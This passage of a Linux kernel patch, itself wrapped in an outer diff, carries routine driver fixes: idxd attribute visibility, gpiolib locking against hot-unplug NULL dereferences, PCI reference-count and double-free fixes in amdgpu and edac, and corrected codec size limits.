+@@ -1233,6 +1252,14 @@ static bool idxd_wq_attr_op_config_invisible(struct attribute *attr,
+ 	       !idxd->hw.wq_cap.op_config;
+ }
+ 
++static bool idxd_wq_attr_max_batch_size_invisible(struct attribute *attr,
++						  struct idxd_device *idxd)
++{
++	/* Intel IAA does not support batch processing, make it invisible */
++	return attr == &dev_attr_wq_max_batch_size.attr &&
++	       idxd->data->type == IDXD_TYPE_IAX;
++}
++
+ static umode_t idxd_wq_attr_visible(struct kobject *kobj,
+ 				    struct attribute *attr, int n)
+ {
+@@ -1243,6 +1270,9 @@ static umode_t idxd_wq_attr_visible(struct kobject *kobj,
+ 	if (idxd_wq_attr_op_config_invisible(attr, idxd))
+ 		return 0;
+ 
++	if (idxd_wq_attr_max_batch_size_invisible(attr, idxd))
++		return 0;
++
+ 	return attr->mode;
+ }
+ 
+@@ -1533,6 +1563,43 @@ static ssize_t cmd_status_store(struct device *dev, struct device_attribute *att
+ }
+ static DEVICE_ATTR_RW(cmd_status);
+ 
++static bool idxd_device_attr_max_batch_size_invisible(struct attribute *attr,
++						      struct idxd_device *idxd)
++{
++	/* Intel IAA does not support batch processing, make it invisible */
++	return attr == &dev_attr_max_batch_size.attr &&
++	       idxd->data->type == IDXD_TYPE_IAX;
++}
++
++static bool idxd_device_attr_read_buffers_invisible(struct attribute *attr,
++						    struct idxd_device *idxd)
++{
++	/*
++	 * Intel IAA does not support Read Buffer allocation control,
++	 * make these attributes invisible.
++	 */
++	return (attr == &dev_attr_max_tokens.attr ||
++		attr == &dev_attr_max_read_buffers.attr ||
++		attr == &dev_attr_token_limit.attr ||
++		attr == &dev_attr_read_buffer_limit.attr) &&
++		idxd->data->type == IDXD_TYPE_IAX;
++}
++
++static umode_t idxd_device_attr_visible(struct kobject *kobj,
++					struct attribute *attr, int n)
++{
++	struct device *dev = container_of(kobj, struct device, kobj);
++	struct idxd_device *idxd = confdev_to_idxd(dev);
++
++	if (idxd_device_attr_max_batch_size_invisible(attr, idxd))
++		return 0;
++
++	if (idxd_device_attr_read_buffers_invisible(attr, idxd))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *idxd_device_attributes[] = {
+ 	&dev_attr_version.attr,
+ 	&dev_attr_max_groups.attr,
+@@ -1560,6 +1627,7 @@ static struct attribute *idxd_device_attributes[] = {
+ 
+ static const struct attribute_group idxd_device_attribute_group = {
+ 	.attrs = idxd_device_attributes,
++	.is_visible = idxd_device_attr_visible,
+ };
+ 
+ static const struct attribute_group *idxd_attribute_groups[] = {
+diff --git a/drivers/edac/i10nm_base.c b/drivers/edac/i10nm_base.c
+index a22ea053f8e1c..8af4d2523194a 100644
+--- a/drivers/edac/i10nm_base.c
++++ b/drivers/edac/i10nm_base.c
+@@ -304,11 +304,10 @@ static struct pci_dev *pci_get_dev_wrapper(int dom, unsigned int bus,
+ 	if (unlikely(pci_enable_device(pdev) < 0)) {
+ 		edac_dbg(2, "Failed to enable device %02x:%02x.%x\n",
+ 			 bus, dev, fun);
++		pci_dev_put(pdev);
+ 		return NULL;
+ 	}
+ 
+-	pci_dev_get(pdev);
+-
+ 	return pdev;
+ }
+ 
+diff --git a/drivers/extcon/extcon-usbc-tusb320.c b/drivers/extcon/extcon-usbc-tusb320.c
+index 2a120d8d3c272..9dfa545427ca1 100644
+--- a/drivers/extcon/extcon-usbc-tusb320.c
++++ b/drivers/extcon/extcon-usbc-tusb320.c
+@@ -313,9 +313,9 @@ static void tusb320_typec_irq_handler(struct tusb320_priv *priv, u8 reg9)
+ 		typec_set_pwr_opmode(port, TYPEC_PWR_MODE_USB);
+ }
+ 
+-static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
++static irqreturn_t tusb320_state_update_handler(struct tusb320_priv *priv,
++						bool force_update)
+ {
+-	struct tusb320_priv *priv = dev_id;
+ 	unsigned int reg;
+ 
+ 	if (regmap_read(priv->regmap, TUSB320_REG9, &reg)) {
+@@ -323,7 +323,7 @@ static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(reg & TUSB320_REG9_INTERRUPT_STATUS))
++	if (!force_update && !(reg & TUSB320_REG9_INTERRUPT_STATUS))
+ 		return IRQ_NONE;
+ 
+ 	tusb320_extcon_irq_handler(priv, reg);
+@@ -340,6 +340,13 @@ static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
++static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
++{
++	struct tusb320_priv *priv = dev_id;
++
++	return tusb320_state_update_handler(priv, false);
++}
++
+ static const struct regmap_config tusb320_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+@@ -466,7 +473,7 @@ static int tusb320_probe(struct i2c_client *client,
+ 		return ret;
+ 
+ 	/* update initial state */
+-	tusb320_irq_handler(client->irq, priv);
++	tusb320_state_update_handler(priv, true);
+ 
+ 	/* Reset chip to its default state */
+ 	ret = tusb320_reset(priv);
+@@ -477,7 +484,7 @@ static int tusb320_probe(struct i2c_client *client,
+ 		 * State and polarity might change after a reset, so update
+ 		 * them again and make sure the interrupt status bit is cleared.
+ 		 */
+-		tusb320_irq_handler(client->irq, priv);
++		tusb320_state_update_handler(priv, true);
+ 
+ 	ret = devm_request_threaded_irq(priv->dev, client->irq, NULL,
+ 					tusb320_irq_handler,
+diff --git a/drivers/firmware/raspberrypi.c b/drivers/firmware/raspberrypi.c
+index 4b8978b254f9a..dba315f675bc7 100644
+--- a/drivers/firmware/raspberrypi.c
++++ b/drivers/firmware/raspberrypi.c
+@@ -272,6 +272,7 @@ static int rpi_firmware_probe(struct platform_device *pdev)
+ 		int ret = PTR_ERR(fw->chan);
+ 		if (ret != -EPROBE_DEFER)
+ 			dev_err(dev, "Failed to get mbox channel: %d\n", ret);
++		kfree(fw);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index ebc32bbd9b833..6281e7153b475 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -429,15 +429,14 @@ static inline int ti_sci_do_xfer(struct ti_sci_info *info,
+ 		 * during noirq phase, so we must manually poll the completion.
+ 		 */
+ 		ret = read_poll_timeout_atomic(try_wait_for_completion, done_state,
+-					       true, 1,
++					       done_state, 1,
+ 					       info->desc->max_rx_timeout_ms * 1000,
+ 					       false, &xfer->done);
+ 	}
+ 
+-	if (ret == -ETIMEDOUT || !done_state) {
++	if (ret == -ETIMEDOUT)
+ 		dev_err(dev, "Mbox timedout in resp(caller: %pS)\n",
+ 			(void *)_RET_IP_);
+-	}
+ 
+ 	/*
+ 	 * NOTE: we might prefer not to need the mailbox ticker to manage the
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 0cb6b468f364f..6ab1cf489d035 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -55,6 +55,50 @@ static_assert(IS_ALIGNED(sizeof(struct gpio_v2_line_values), 8));
+  * interface to gpiolib GPIOs via ioctl()s.
+  */
+ 
++typedef __poll_t (*poll_fn)(struct file *, struct poll_table_struct *);
++typedef long (*ioctl_fn)(struct file *, unsigned int, unsigned long);
++typedef ssize_t (*read_fn)(struct file *, char __user *,
++			   size_t count, loff_t *);
++
++static __poll_t call_poll_locked(struct file *file,
++				 struct poll_table_struct *wait,
++				 struct gpio_device *gdev, poll_fn func)
++{
++	__poll_t ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, wait);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
++static long call_ioctl_locked(struct file *file, unsigned int cmd,
++			      unsigned long arg, struct gpio_device *gdev,
++			      ioctl_fn func)
++{
++	long ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, cmd, arg);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
++static ssize_t call_read_locked(struct file *file, char __user *buf,
++				size_t count, loff_t *f_ps,
++				struct gpio_device *gdev, read_fn func)
++{
++	ssize_t ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, buf, count, f_ps);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
+ /*
+  * GPIO line handle management
+  */
+@@ -191,8 +235,8 @@ static long linehandle_set_config(struct linehandle_state *lh,
+ 	return 0;
+ }
+ 
+-static long linehandle_ioctl(struct file *file, unsigned int cmd,
+-			     unsigned long arg)
++static long linehandle_ioctl_unlocked(struct file *file, unsigned int cmd,
++				      unsigned long arg)
+ {
+ 	struct linehandle_state *lh = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+@@ -201,6 +245,9 @@ static long linehandle_ioctl(struct file *file, unsigned int cmd,
+ 	unsigned int i;
+ 	int ret;
+ 
++	if (!lh->gdev->chip)
++		return -ENODEV;
++
+ 	switch (cmd) {
+ 	case GPIOHANDLE_GET_LINE_VALUES_IOCTL:
+ 		/* NOTE: It's okay to read values of output lines */
+@@ -247,6 +294,15 @@ static long linehandle_ioctl(struct file *file, unsigned int cmd,
+ 	}
+ }
+ 
++static long linehandle_ioctl(struct file *file, unsigned int cmd,
++			     unsigned long arg)
++{
++	struct linehandle_state *lh = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, lh->gdev,
++				 linehandle_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long linehandle_ioctl_compat(struct file *file, unsigned int cmd,
+ 				    unsigned long arg)
+@@ -1378,12 +1434,15 @@ static long linereq_set_config(struct linereq *lr, void __user *ip)
+ 	return ret;
+ }
+ 
+-static long linereq_ioctl(struct file *file, unsigned int cmd,
+-			  unsigned long arg)
++static long linereq_ioctl_unlocked(struct file *file, unsigned int cmd,
++				   unsigned long arg)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+ 
++	if (!lr->gdev->chip)
++		return -ENODEV;
++
+ 	switch (cmd) {
+ 	case GPIO_V2_LINE_GET_VALUES_IOCTL:
+ 		return linereq_get_values(lr, ip);
+@@ -1396,6 +1455,15 @@ static long linereq_ioctl(struct file *file, unsigned int cmd,
+ 	}
+ }
+ 
++static long linereq_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, lr->gdev,
++				 linereq_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long linereq_ioctl_compat(struct file *file, unsigned int cmd,
+ 				 unsigned long arg)
+@@ -1404,12 +1472,15 @@ static long linereq_ioctl_compat(struct file *file, unsigned int cmd,
+ }
+ #endif
+ 
+-static __poll_t linereq_poll(struct file *file,
+-			    struct poll_table_struct *wait)
++static __poll_t linereq_poll_unlocked(struct file *file,
++				      struct poll_table_struct *wait)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!lr->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &lr->wait, wait);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&lr->events,
+@@ -1419,16 +1490,25 @@ static __poll_t linereq_poll(struct file *file,
+ 	return events;
+ }
+ 
+-static ssize_t linereq_read(struct file *file,
+-			    char __user *buf,
+-			    size_t count,
+-			    loff_t *f_ps)
++static __poll_t linereq_poll(struct file *file,
++			     struct poll_table_struct *wait)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_poll_locked(file, wait, lr->gdev, linereq_poll_unlocked);
++}
++
++static ssize_t linereq_read_unlocked(struct file *file, char __user *buf,
++				     size_t count, loff_t *f_ps)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	struct gpio_v2_line_event le;
+ 	ssize_t bytes_read = 0;
+ 	int ret;
+ 
++	if (!lr->gdev->chip)
++		return -ENODEV;
++
+ 	if (count < sizeof(le))
+ 		return -EINVAL;
+ 
+@@ -1473,6 +1553,15 @@ static ssize_t linereq_read(struct file *file,
+ 	return bytes_read;
+ }
+ 
++static ssize_t linereq_read(struct file *file, char __user *buf,
++			    size_t count, loff_t *f_ps)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_read_locked(file, buf, count, f_ps, lr->gdev,
++				linereq_read_unlocked);
++}
++
+ static void linereq_free(struct linereq *lr)
+ {
+ 	unsigned int i;
+@@ -1710,12 +1799,15 @@ struct lineevent_state {
+ 	(GPIOEVENT_REQUEST_RISING_EDGE | \
+ 	GPIOEVENT_REQUEST_FALLING_EDGE)
+ 
+-static __poll_t lineevent_poll(struct file *file,
+-			       struct poll_table_struct *wait)
++static __poll_t lineevent_poll_unlocked(struct file *file,
++					struct poll_table_struct *wait)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!le->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &le->wait, wait);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&le->events, &le->wait.lock))
+@@ -1724,15 +1816,21 @@ static __poll_t lineevent_poll(struct file *file,
+ 	return events;
+ }
+ 
++static __poll_t lineevent_poll(struct file *file,
++			       struct poll_table_struct *wait)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_poll_locked(file, wait, le->gdev, lineevent_poll_unlocked);
++}
++
+ struct compat_gpioeevent_data {
+ 	compat_u64	timestamp;
+ 	u32		id;
+ };
+ 
+-static ssize_t lineevent_read(struct file *file,
+-			      char __user *buf,
+-			      size_t count,
+-			      loff_t *f_ps)
++static ssize_t lineevent_read_unlocked(struct file *file, char __user *buf,
++				       size_t count, loff_t *f_ps)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	struct gpioevent_data ge;
+@@ -1740,6 +1838,9 @@ static ssize_t lineevent_read(struct file *file,
+ 	ssize_t ge_size;
+ 	int ret;
+ 
++	if (!le->gdev->chip)
++		return -ENODEV;
++
+ 	/*
+ 	 * When compatible system call is being used the struct gpioevent_data,
+ 	 * in case of at least ia32, has different size due to the alignment
+@@ -1797,6 +1898,15 @@ static ssize_t lineevent_read(struct file *file,
+ 	return bytes_read;
+ }
+ 
++static ssize_t lineevent_read(struct file *file, char __user *buf,
++			      size_t count, loff_t *f_ps)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_read_locked(file, buf, count, f_ps, le->gdev,
++				lineevent_read_unlocked);
++}
++
+ static void lineevent_free(struct lineevent_state *le)
+ {
+ 	if (le->irq)
+@@ -1814,13 +1924,16 @@ static int lineevent_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static long lineevent_ioctl(struct file *file, unsigned int cmd,
+-			    unsigned long arg)
++static long lineevent_ioctl_unlocked(struct file *file, unsigned int cmd,
++				     unsigned long arg)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+ 	struct gpiohandle_data ghd;
+ 
++	if (!le->gdev->chip)
++		return -ENODEV;
++
+ 	/*
+ 	 * We can get the value for an event line but not set it,
+ 	 * because it is input by definition.
+@@ -1843,6 +1956,15 @@ static long lineevent_ioctl(struct file *file, unsigned int cmd,
+ 	return -EINVAL;
+ }
+ 
++static long lineevent_ioctl(struct file *file, unsigned int cmd,
++			    unsigned long arg)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, le->gdev,
++				 lineevent_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long lineevent_ioctl_compat(struct file *file, unsigned int cmd,
+ 				   unsigned long arg)
+@@ -2401,12 +2523,15 @@ static int lineinfo_changed_notify(struct notifier_block *nb,
+ 	return NOTIFY_OK;
+ }
+ 
+-static __poll_t lineinfo_watch_poll(struct file *file,
+-				    struct poll_table_struct *pollt)
++static __poll_t lineinfo_watch_poll_unlocked(struct file *file,
++					     struct poll_table_struct *pollt)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!cdev->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &cdev->wait, pollt);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&cdev->events,
+@@ -2416,8 +2541,17 @@ static __poll_t lineinfo_watch_poll(struct file *file,
+ 	return events;
+ }
+ 
+-static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+-				   size_t count, loff_t *off)
++static __poll_t lineinfo_watch_poll(struct file *file,
++				    struct poll_table_struct *pollt)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_poll_locked(file, pollt, cdev->gdev,
++				lineinfo_watch_poll_unlocked);
++}
++
++static ssize_t lineinfo_watch_read_unlocked(struct file *file, char __user *buf,
++					    size_t count, loff_t *off)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	struct gpio_v2_line_info_changed event;
+@@ -2425,6 +2559,9 @@ static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+ 	int ret;
+ 	size_t event_size;
+ 
++	if (!cdev->gdev->chip)
++		return -ENODEV;
++
+ #ifndef CONFIG_GPIO_CDEV_V1
+ 	event_size = sizeof(struct gpio_v2_line_info_changed);
+ 	if (count < event_size)
+@@ -2492,6 +2629,15 @@ static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+ 	return bytes_read;
+ }
+ 
++static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
++				   size_t count, loff_t *off)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_read_locked(file, buf, count, off, cdev->gdev,
++				lineinfo_watch_read_unlocked);
++}
++
+ /**
+  * gpio_chrdev_open() - open the chardev for ioctl operations
+  * @inode: inode for this chardev
+@@ -2505,13 +2651,17 @@ static int gpio_chrdev_open(struct inode *inode, struct file *file)
+ 	struct gpio_chardev_data *cdev;
+ 	int ret = -ENOMEM;
+ 
++	down_read(&gdev->sem);
++
+ 	/* Fail on open if the backing gpiochip is gone */
+-	if (!gdev->chip)
+-		return -ENODEV;
++	if (!gdev->chip) {
++		ret = -ENODEV;
++		goto out_unlock;
++	}
+ 
+ 	cdev = kzalloc(sizeof(*cdev), GFP_KERNEL);
+ 	if (!cdev)
+-		return -ENOMEM;
++		goto out_unlock;
+ 
+ 	cdev->watched_lines = bitmap_zalloc(gdev->chip->ngpio, GFP_KERNEL);
+ 	if (!cdev->watched_lines)
+@@ -2534,6 +2684,8 @@ static int gpio_chrdev_open(struct inode *inode, struct file *file)
+ 	if (ret)
+ 		goto out_unregister_notifier;
+ 
++	up_read(&gdev->sem);
++
+ 	return ret;
+ 
+ out_unregister_notifier:
+@@ -2543,6 +2695,8 @@ out_free_bitmap:
+ 	bitmap_free(cdev->watched_lines);
+ out_free_cdev:
+ 	kfree(cdev);
++out_unlock:
++	up_read(&gdev->sem);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index a70522aef3557..5974cfc61b417 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -735,6 +735,7 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 	spin_unlock_irqrestore(&gpio_lock, flags);
+ 
+ 	BLOCKING_INIT_NOTIFIER_HEAD(&gdev->notifier);
++	init_rwsem(&gdev->sem);
+ 
+ #ifdef CONFIG_PINCTRL
+ 	INIT_LIST_HEAD(&gdev->pin_ranges);
+@@ -875,6 +876,8 @@ void gpiochip_remove(struct gpio_chip *gc)
+ 	unsigned long	flags;
+ 	unsigned int	i;
+ 
++	down_write(&gdev->sem);
++
+ 	/* FIXME: should the legacy sysfs handling be moved to gpio_device? */
+ 	gpiochip_sysfs_unregister(gdev);
+ 	gpiochip_free_hogs(gc);
+@@ -909,6 +912,7 @@ void gpiochip_remove(struct gpio_chip *gc)
+ 	 * gone.
+ 	 */
+ 	gcdev_unregister(gdev);
++	up_write(&gdev->sem);
+ 	put_device(&gdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(gpiochip_remove);
+diff --git a/drivers/gpio/gpiolib.h b/drivers/gpio/gpiolib.h
+index d900ecdbac46d..9ad68a0adf4a8 100644
+--- a/drivers/gpio/gpiolib.h
++++ b/drivers/gpio/gpiolib.h
+@@ -15,6 +15,7 @@
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/cdev.h>
++#include <linux/rwsem.h>
+ 
+ #define GPIOCHIP_NAME	"gpiochip"
+ 
+@@ -39,6 +40,9 @@
+  * @list: links gpio_device:s together for traversal
+  * @notifier: used to notify subscribers about lines being requested, released
+  *            or reconfigured
++ * @sem: protects the structure from a NULL-pointer dereference of @chip by
++ *       user-space operations when the device gets unregistered during
++ *       a hot-unplug event
+  * @pin_ranges: range of pins served by the GPIO driver
+  *
+  * This state container holds most of the runtime variable data
+@@ -60,6 +64,7 @@ struct gpio_device {
+ 	void			*data;
+ 	struct list_head        list;
+ 	struct blocking_notifier_head notifier;
++	struct rw_semaphore	sem;
+ 
+ #ifdef CONFIG_PINCTRL
+ 	/*
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 1f76e27f1a354..fe87b3402f06a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2256,7 +2256,7 @@ int amdgpu_amdkfd_gpuvm_import_dmabuf(struct amdgpu_device *adev,
+ 
+ 	ret = drm_vma_node_allow(&obj->vma_node, drm_priv);
+ 	if (ret) {
+-		kfree(mem);
++		kfree(*mem);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+index e363f56c72af1..30c28a69e847d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+@@ -317,6 +317,7 @@ static bool amdgpu_atrm_get_bios(struct amdgpu_device *adev)
+ 
+ 	if (!found)
+ 		return false;
++	pci_dev_put(pdev);
+ 
+ 	adev->bios = kmalloc(size, GFP_KERNEL);
+ 	if (!adev->bios) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index f1e9663b40510..913f22d41673d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2462,6 +2462,11 @@ static int amdgpu_device_ip_init(struct amdgpu_device *adev)
+ 			if (!amdgpu_sriov_vf(adev)) {
+ 				struct amdgpu_hive_info *hive = amdgpu_get_xgmi_hive(adev);
+ 
++				if (WARN_ON(!hive)) {
++					r = -ENOENT;
++					goto init_failed;
++				}
++
+ 				if (!hive->reset_domain ||
+ 				    !amdgpu_reset_get_reset_domain(hive->reset_domain)) {
+ 					r = -ENOENT;
+@@ -5027,6 +5032,8 @@ static void amdgpu_device_resume_display_audio(struct amdgpu_device *adev)
+ 		pm_runtime_enable(&(p->dev));
+ 		pm_runtime_resume(&(p->dev));
+ 	}
++
++	pci_dev_put(p);
+ }
+ 
+ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+@@ -5065,6 +5072,7 @@ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+ 
+ 		if (expires < ktime_get_mono_fast_ns()) {
+ 			dev_warn(adev->dev, "failed to suspend display audio\n");
++			pci_dev_put(p);
+ 			/* TODO: abort the succeeding gpu reset? */
+ 			return -ETIMEDOUT;
+ 		}
+@@ -5072,6 +5080,7 @@ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+ 
+ 	pm_runtime_disable(&(p->dev));
+ 
++	pci_dev_put(p);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 49c4347d154ce..2b9d806e23afb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -75,6 +75,8 @@ struct amdgpu_vf_error_buffer {
+ 	uint64_t data[AMDGPU_VF_ERROR_ENTRY_SIZE];
+ };
+ 
++enum idh_request;
++
+ /**
+  * struct amdgpu_virt_ops - amdgpu device virt operations
+  */
+@@ -84,7 +86,8 @@ struct amdgpu_virt_ops {
+ 	int (*req_init_data)(struct amdgpu_device *adev);
+ 	int (*reset_gpu)(struct amdgpu_device *adev);
+ 	int (*wait_reset)(struct amdgpu_device *adev);
+-	void (*trans_msg)(struct amdgpu_device *adev, u32 req, u32 data1, u32 data2, u32 data3);
++	void (*trans_msg)(struct amdgpu_device *adev, enum idh_request req,
++			  u32 data1, u32 data2, u32 data3);
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
+index 47159e9a08848..4b9e7b050ccd2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
+@@ -386,7 +386,6 @@ struct amdgpu_hive_info *amdgpu_get_xgmi_hive(struct amdgpu_device *adev)
+ 	if (ret) {
+ 		dev_err(adev->dev, "XGMI: failed initializing kobject for xgmi hive\n");
+ 		kobject_put(&hive->kobj);
+-		kfree(hive);
+ 		hive = NULL;
+ 		goto pro_end;
+ 	}
+@@ -410,7 +409,6 @@ struct amdgpu_hive_info *amdgpu_get_xgmi_hive(struct amdgpu_device *adev)
+ 				dev_err(adev->dev, "XGMI: failed initializing reset domain for xgmi hive\n");
+ 				ret = -ENOMEM;
+ 				kobject_put(&hive->kobj);
+-				kfree(hive);
+ 				hive = NULL;
+ 				goto pro_end;
+ 			}
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index b3fba8dea63ca..6853b93ac82e7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -82,10 +82,10 @@ static const struct amdgpu_video_codecs nv_video_codecs_encode =
+ /* Navi1x */
+ static const struct amdgpu_video_codec_info nv_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -100,10 +100,10 @@ static const struct amdgpu_video_codecs nv_video_codecs_decode =
+ /* Sienna Cichlid */
+ static const struct amdgpu_video_codec_info sc_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -125,10 +125,10 @@ static struct amdgpu_video_codec_info sriov_sc_video_codecs_encode_array[] =
+ 
+ static struct amdgpu_video_codec_info sriov_sc_video_codecs_decode_array[] =
+ {
